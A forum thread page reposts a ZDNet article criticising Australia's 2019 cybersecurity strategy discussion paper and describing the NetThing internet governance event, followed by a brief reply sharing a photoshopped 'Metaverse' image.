"Australia champions an open, free, and secure internet in a range of international forums, bilaterally and in multilateral groups including the UN, East Asia Summit, and ASEAN Regional Forum. Australia has partnered with countries in the region through cyber policy dialogues to advance our advocacy of an open, free, and secure cyberspace," it says.

"Australia has worked with international partners to secure leader-level re-affirmation of key tenets of international stability in cyberspace including the application of existing international law and agreed norms of behaviour."

Job done, apparently.

Australia is continuing to engage internationally on the rules of behaviour in cyberspace, but the discussion paper barely mentions it as a future activity.

Government involvement: More, or the same, but definitely not less

Cryptographer Dr Vanessa Teague from the University of Melbourne said that Australia needs to think about the questions not being asked.

"[The discussion paper] seems to me to be infused with the unshakeable belief that more active government involvement must be a good thing for cybersecurity," she said.

In a section on the government's role, it says that maintaining the confidence of the Australian community is the first priority when considering how and when government should use its cyber security capabilities.

"Key to this is whether you think government could do more to confront cybercrime and protect the networks that underpin our way of life, or whether you think the current arrangements are right," it says.

Less government involvement isn't an option. The same level of government involvement, but under different arrangements, isn't an option either.

"In my humble opinion, what we've seen is over many years of Australian cybersecurity policy is bipartisan support for a series of very bad policies," Teague said.

They include the Defence Trade Controls Act 2012, which restricts the export of new cryptographic ideas, and of course the highly controversial Telecommunications and Other Legislation Amendment (Assistance and Access) Act 2018 that many in industry believe will damage Australia's tech economy.

"I think we're not just looking at a government that is, you know, well-intentioned but a little bit ineffectual. We're actually looking at a series of policies that have actively done damage," Teague said.

"I don't think they're deliberately doing damage. I think they're pursuing an agenda oriented around surveillance and control, which inevitably has by-product of damaging our cybersecurity."

Any government that's serious about discussing cybersecurity "needs to divorce it from the national security narrative", Krahulcova said.

The room needs to include people from industry, cybersecurity experts, and civil society representatives, not just law enforcement and security agencies who are trying to make their jobs easier.

"Often it's a room full of white guys in suits," she said.

Public submissions to the strategy close this Friday, November 1.

'Reinvigorating' Australia's internet community

NetThing was an attempt to restart collaboration among the country's internet-related civil society organisations following the demise of the annual Australian Internet Governance Forum (auIGF).

Its organiser, .au Domain Administration (auDA), shut down auIGF after the 2016 event following a review of its community activities.

NetThing included representatives from Access Now, Asia Pacific Network Information Centre, auDA, Australian Privacy Foundation, Australian Communications Consumer Action Network, Australian Strategic Policy Institute, Code Like a Girl, Communications Alliance, Democracy in Colour, Department of Communications and the Arts, Department of Foreign Affairs and Trade Digital Rights Watch, Electronic Frontiers Australia, InternetNZ, and IoT Alliance Australia, as well as academics, and commercial organisations including Deloitte, Google Australia, ProductSpace, Telstra, ThoughtWorks, and Vault.

The event had the strap line "Australian internet governance community moving forward". From where your writer was sitting, however, there wasn't much moving forward. At least not yet.

Plenty of civil society players were in the room, both old and new. Problems were reiterated, both old and new. Grievances were aired. And there was some good energy.

"The government is bad, m'kay?" Yes, but what does "The government is good" look like? What happens next? That wasn't clear.

The challenge for all these players will be to keep the momentum going, and quickly. The rolling skateboard needs another push or three, or it'll fall over.

More Cyber From Stilgherrian

'No such thing' as cyber warfare: Australia's head of cyber warfare

Warfare is warfare, espionage is internationally normal, and cyber is just one of a suite of potential capabilities for a military response, says Major General Marcus Thompson.

Australian CEOs are too overoptimistic for cybersecurity, out of touch on privacy

Only 6% of surveyed CEOs think their organisation has suffered a data breach in the last year, but 63% of their CISOs say they have, according to Unisys research. Big disconnect.

Schneier slams Australia's encryption laws and CyberCon speaker bans

Governments breaking encryption is bad, and 'will get worse once breaking encryption means people can die', says one of the world's leading security experts.

AI to 'fundamentally shift' global balance of power

The focus of Australia's cyber diplomacy is expanding to include "grand strategy in technology", as well as engagement with technology firms and governments.

Government interference in Australia's premier cybersecurity conference is a worry

Two 'incongruent' speakers were dumped from Australia's CyberCon. And bizarrely, the media was barred from covering a session explaining a public consultation process.
https://www.zdnet.com/article/cyber-sec ... ty-agenda/
Mazars and Deutsche Bank could have ended this nightmare before it started.
They could still get him out of office.
But instead, they want mass death.
Don’t forget that.
User avatar
seemslikeadream
 
Posts: 32090
Joined: Wed Apr 27, 2005 11:28 pm
Location: into the black
Blog: View Blog (83)

Re: The first global cyber war has begun

Postby MacCruiskeen » Wed May 11, 2022 4:39 am

Welcome to the Metaverse:

Image
https://pbs.twimg.com/media/FSQ3qrmXoAE ... ame=medium
"Hello Danny. Come and play with us. Come and play with us, Danny. Forever...and ever...and ever..."


(It's photoshopped. Will post the original if I can find it again.)
"Ich kann gar nicht so viel fressen, wie ich kotzen möchte." - Max Liebermann,, Berlin, 1933

"Science is the belief in the ignorance of experts." - Richard Feynman, NYC, 1966

TESTDEMIC ➝ "CASE"DEMIC
User avatar
MacCruiskeen
 
Posts: 10558
Joined: Thu Nov 16, 2006 6:47 pm
Blog: View Blog (0)

Previous

Return to General Discussion

Who is online

Users browsing this forum: No registered users and 6 guests